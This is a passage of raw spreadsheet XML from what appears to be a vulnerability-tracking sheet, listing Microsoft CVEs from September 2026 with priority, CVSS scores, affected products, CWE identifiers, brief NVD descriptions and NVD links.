t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t></is></c></row><row r="215"><c r="A215" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C215" s="5" t="inlineStr"><is><t>CVE-2026-77487</t></is></c><c r="D215" s="5" t="n"><v>8.800000000000001</v></c><c r="E215" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F215" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G215" s="5" t="inlineStr" /><c r="H215" s="5" t="n"><v>0.005</v></c><c r="I215" s="5" t="inlineStr" /><c r="J215" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K215" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L215" s="5" t="inlineStr" /><c r="M215" s="5" t="inlineStr" /><c r="N215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P215" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q215" s="5" t="inlineStr" /><c r="R215" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S215" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t></is></c></row><row r="216"><c r="A216" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C216" s="5" t="inlineStr"><is><t>CVE-2026-77495</t></is></c><c r="D216" s="5" t="n"><v>8.800000000000001</v></c><c r="E216" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G216" s="5" t="inlineStr" /><c r="H216" s="5" t="n"><v>0.006</v></c><c r="I216" s="5" t="inlineStr" /><c r="J216" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K21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16" s="5" t="inlineStr" /><c r="M216" s="5" t="inlineStr" /><c r="N216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P216" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q216" s="5" t="inlineStr" /><c r="R216" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S216" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t></is></c></row><row r="217"><c r="A217" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C217" s="5" t="inlineStr"><is><t>CVE-2026-77504</t></is></c><c r="D217" s="5" t="n"><v>8.800000000000001</v></c><c r="E217" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G217" s="5" t="inlineStr" /><c r="H217" s="5" t="n"><v>0.006</v></c><c r="I217" s="5" t="inlineStr" /><c r="J217" s="5" t="inlineStr" /><c r="K217" s="5" t="inlineStr" /><c r="L217" s="5" t="inlineStr" /><c r="M217" s="5" t="inlineStr" /><c r="N217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P217" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q217" s="5" t="inlineStr" /><c r="R217" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S217" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t></is></c></row><row r="218"><c r="A218" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C218" s="5" t="inlineStr"><is><t>CVE-2026-77901</t></is></c><c r="D218" s="5" t="n"><v>8.800000000000001</v></c><c r="E218" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G218" s="5" t="inlineStr" /><c r="H218" s="5" t="n"><v>0.006</v></c><c r="I218" s="5" t="inlineStr" /><c r="J218" s="5" t="inlineStr" /><c r="K218" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L218" s="5" t="inlineStr" /><c r="M218" s="5" t="inlineStr" /><c r="N218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P218" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q218" s="5" t="inlineStr" /><c r="R218" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S218" s="5" t="inlineStr"><is><t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t></is></c></row><row r="219"><c r="A219" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C219" s="5" t="inlineStr"><is><t>CVE-2026-77906</t></is></c><c r="D219" s="5" t="n"><v>8.800000000000001</v></c><c r="E219" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G219" s="5" t="inlineStr" /><c r="H219" s="5" t="n"><v>0.008</v></c><c r="I219" s="5" t="inlineStr" /><c r="J219" s="5" t="inlineStr" /><c r="K219" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L219" s="5" t="inlineStr" /><c r="M219" s="5" t="inlineStr" /><c r="N219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P219" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q219" s="5" t="inlineStr" /><c r="R219" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S219" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t></is></c></row><row r="220"><c r="A220" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C220" s="5" t="inlineStr"><is><t>CVE-2026-77907</t></is></c><c r="D220" s="5" t="n"><v>8.800000000000001</v></c><c r="E220" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G220" s="5" t="inlineStr" /><c r="H220" s="5" t="n"><v>0.005</v></c><c r="I220" s="5" t="inlineStr" /><c r="J220" s="5" t="inlineStr" /><c r="K220" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L220" s="5" t="inlineStr" /><c r="M220" s="5" t="inlineStr" /><c r="N220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P220" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q220" s="5" t="inlineStr" /><c r="R220" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S220" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t></is></c></row><row r="221"><c r="A221" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C221" s="5" t="inlineStr"><is><t>CVE-2026-77908</t></is></c><c r="D221" s="5" t="n"><v>8.800000000000001</v></c><c r="E221" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G221" s="5" t="inlineStr" /><c r="H221" s="5" t="n"><v>0.007</v></c><c r="I221" s="5" t="inlineStr" /><c r="J221" s="5" t="inlineStr" /><c r="K221" s="5" t="inlineStr" /><c r="L221" s="5" t="inlineStr" /><c r="M221" s="5" t="inlineStr" /><c r="N221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q221" s="5" t="inlineStr" /><c r="R221" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S221" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t></is></c></row><row r="222"><c r="A222" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C222" s="5" t="inlineStr"><is><t>CVE-2026-78439</t></is></c><c r="D222" s="5" t="n"><v>8.800000000000001</v></c><c r="E222" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G222" s="5" t="inlineStr" /><c r="H222" s="5" t="n"><v>0.006</v></c><c r="I222" s="5" t="inlineStr" /><c r="J222" s="5" t="inlineStr" /><c r="K222" s="5" t="inlineStr" /><c r="L222" s="5" t="inlineStr" /><c r="M222" s="5" t="inlineStr" /><c r="N222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P222" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q222" s="5" t="inlineStr" /><c r="R222" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S222" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t></is></c></row><row r="223"><c r="A223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C223" s="5" t="inlineStr"><is><t>CVE-2026-78442</t></is></c><c r="D223" s="5" t="n"><v>8.800000000000001</v></c><c r="E223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G223" s="5" t="inlineStr" /><c r="H223" s="5" t="n"><v>0.006</v></c><c r="I223" s="5" t="inlineStr" /><c r="J223" s="5" t="inlineStr" /><c r="K223" s="5" t="inlineStr" /><c r="L223" s="5" t="inlineStr" /><c r="M223" s="5" t="inlineStr" /><c r="N223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P223" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q223" s="5" t="inlineStr" /><c r="R223" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S223" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t></is></c></row><row r="224"><c r="A224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C224" s="5" t="inlineStr"><is><t>CVE-2026-78456</t></is></c><c r="D224" s="5" t="n"><v>8.800000000000001</v></c><c r="E224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G224" s="5" t="inlineStr" /><c r="H224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I224" s="5" t="inlineStr" /><c r="J224" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K224" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022</t></is></c><c r="L224" s="5" t="inlineStr" /><c r="M224" s="5" t="inlineStr" /><c r="N224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P224" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q224" s="5" t="inlineStr" /><c r="R224" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S224" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t></is></c></row><row r="225"><c r="A225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C225" s="5" t="inlineStr"><is><t>CVE-2026-78462</t></is></c><c r="D225" s="5" t="n"><v>8.800000000000001</v></c><c r="E225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G225" s="5" t="inlineStr" /><c r="H225" s="5" t="n"><v>0.005</v></c><c r="I225" s="5" t="inlineStr" /><c r="J225" s="5" t="inlineStr" /><c r="K225" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L225" s="5" t="inlineStr" /><c r="M225" s="5" t="inlineStr" /><c r="N225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P225" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q225" s="5" t="inlineStr" /><c r="R225" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S225" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t></is></c></row><row r="226"><c r="A226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C226" s="5" t="inlineStr"><is><t>CVE-2026-78463</t></is></c><c r="D226" s="5" t="n"><v>8.800000000000001</v></c><c r="E226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G226" s="5" t="inlineStr" /><c r="H226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I226" s="5" t="inlineStr" /><c r="J226" s="5" t="inlineStr" /><c r="K226" s="5" t="inlineStr" /><c r="L226" s="5" t="inlineStr" /><c r="M226" s="5" t="inlineStr" /><c r="N226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P226" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q226" s="5" t="inlineStr" /><c r="R226" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S226" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t></is></c></row><row r="227"><c r="A227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C227" s="5" t="inlineStr"><is><t>CVE-2026-78504</t></is></c><c r="D227" s="5" t="n"><v>8.800000000000001</v></c><c r="E227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G227" s="5" t="inlineStr" /><c r="H227" s="5" t="n"><v>0.006</v></c><c r="I227" s="5" t="inlineStr" /><c r="J227" s="5" t="inlineStr" /><c r="K227" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L227" s="5" t="inlineStr" /><c r="M227" s="5" t="inlineStr" /><c r="N227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P227" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q227" s="5" t="inlineStr" /><c r="R227" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S227" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t></is></c></row><row r="228"><c r="A228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C228" s="5" t="inlineStr"><is><t>CVE-2026-78505</t></is></c><c r="D228" s="5" t="n"><v>8.800000000000001</v></c><c r="E228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G228" s="5" t="inlineStr" /><c r="H228" s="5" t="n"><v>0.008</v></c><c r="I228" s="5" t="inlineStr" /><c r="J228" s="5" t="inlineStr" /><c r="K228" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L228" s="5" t="inlineStr" /><c r="M228" s="5" t="inlineStr" /><c r="N228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q228" s="5" t="inlineStr" /><c r="R228" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S228" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t></is></c></row><row r="229"><c r="A229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C229" s="5" t="inlineStr"><is><t>CVE-2026-78507</t></is></c><c r="D229" s="5" t="n"><v>8.800000000000001</v></c><c r="E229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G229" s="5" t="inlineStr" /><c r="H229" s="5" t="n"><v>0.006</v></c><c r="I229" s="5" t="inlineStr" /><c r="J229" s="5" t="inlineStr" /><c r="K229" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L229" s="5" t="inlineStr" /><c r="M229" s="5" t="inlineStr" /><c r="N229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q229" s="5" t="inlineStr" /><c r="R229" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S229" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t></is></c></row><row r="230"><c r="A230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C230" s="5" t="inlineStr"><is><t>CVE-2026-78511</t></is></c><c r="D230" s="5" t="n"><v>8.800000000000001</v></c><c r="E230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G230" s="5" t="inlineStr" /><c r="H230" s="5" t="n"><v>0.008</v></c><c r="I230" s="5" t="inlineStr" /><c r="J230" s="5" t="inlineStr" /><c r="K230" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L230" s="5" t="inlineStr" /><c r="M230" s="5" t="inlineStr" /><c r="N230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P230" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q230" s="5" t="inlineStr" /><c r="R230" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S230" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t></is></c></row><row r="231"><c r="A231" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C231" s="5" t="inlineStr"><is><t>CVE-2026-78512</t></is></c><c r="D231" s="5" t="n"><v>8.800000000000001</v></c><c r="E231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F231" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G231" s="5" t="inlineStr" /><c r="H231" s="5" t="n"><v>0.008</v></c><c r="I231" s="5" t="inlineStr" /><c r="J231" s="5" t="inlineStr" /><c r="K231" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L231" s="5" t="inlineStr" /><c r="M231" s="5" t="inlineStr" /><c r="N231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P231" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q231" s="5" t="inlineStr" /><c r="R231" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S231" s="5" t="inlineStr"><is><t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t></is></c></row><row r="232"><c r="A232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C232" s="5" t="inlineStr"><is><t>CVE-2026-78514</t></is></c><c r="D232" s="5" t="n"><v>8.800000000000001</v></c><c r="E232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F232" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G232" s="5" t="inlineStr" /><c r="H232" s="5" t="n"><v>0.006</v></c><c r="I232" s="5" t="inlineStr" /><c r="J232" s="5" t="inlineStr" /><c r="K232" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L232" s="5" t="inlineStr" /><c r="M232" s="5" t="inlineStr" /><c r="N232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P232" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q232" s="5" t="inlineStr" /><c r="R232" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S232" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t></is></c></row><row r="233"><c r="A233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C233" s="5" t="inlineStr"><is><t>CVE-2026-78517</t></is></c><c r="D233" s="5" t="n"><v>8.800000000000001</v></c><c r="E233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F233" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G233" s="5" t="inlineStr" /><c r="H233" s="5" t="n"><v>0.006</v></c><c r="I233" s="5" t="inlineStr" /><c r="J233" s="5" t="inlineStr" /><c r="K233" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L233" s="5" t="inlineStr" /><c r="M233" s="5" t="inlineStr" /><c r="N233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P233" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q233" s="5" t="inlineStr" /><c r="R233" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S233" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t></is></c></row><row r="234"><c r="A234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C234" s="5" t="inlineStr"><is><t>CVE-2026-78518</t></is></c><c r="D234" s="5" t="n"><v>8.800000000000001</v></c><c r="E234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F234" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G234" s="5" t="inlineStr" /><c r="H234" s="5" t="n"><v>0.008999999999999999</v></c><c r="I234" s="5" t="inlineStr" /><c r="J234" s="5" t="inlineStr" /><c r="K234" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L234" s="5" t="inlineStr" /><c r="M234" s="5" t="inlineStr" /><c r="N234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P234" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q234" s="5" t="inlineStr" /><c r="R234" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S234" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t></is></c></row><row r="235"><c r="A235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C235" s="5" t="inlineStr"><is><t>CVE-2026-78519</t></is></c><c r="D235" s="5" t="n"><v>8.800000000000001</v></c><c r="E235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F235" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G235" s="5" t="inlineStr" /><c r="H235" s="5" t="n"><v>0.006</v></c><c r="I235" s="5" t="inlineStr" /><c r="J235" s="5" t="inlineStr" /><c r="K235" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L235" s="5" t="inlineStr" /><c r="M235" s="5" t="inlineStr" /><c r="N235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P235" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q235" s="5" t="inlineStr" /><c r="R235" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S235" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t></is></c></row><row r="236"><c r="A236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C236" s="5" t="inlineStr"><is><t>CVE-2026-78521</t></is></c><c r="D236" s="5" t="n"><v>8.800000000000001</v></c><c r="E236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F236" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G236" s="5" t="inlineStr" /><c r="H236" s="5" t="n"><v>0.006</v></c><c r="I236" s="5" t="inlineStr" /><c r="J236" s="5" t="inlineStr" /><c r="K236" s="5" t="inlineStr"><is><t>microsoft:365_apps, 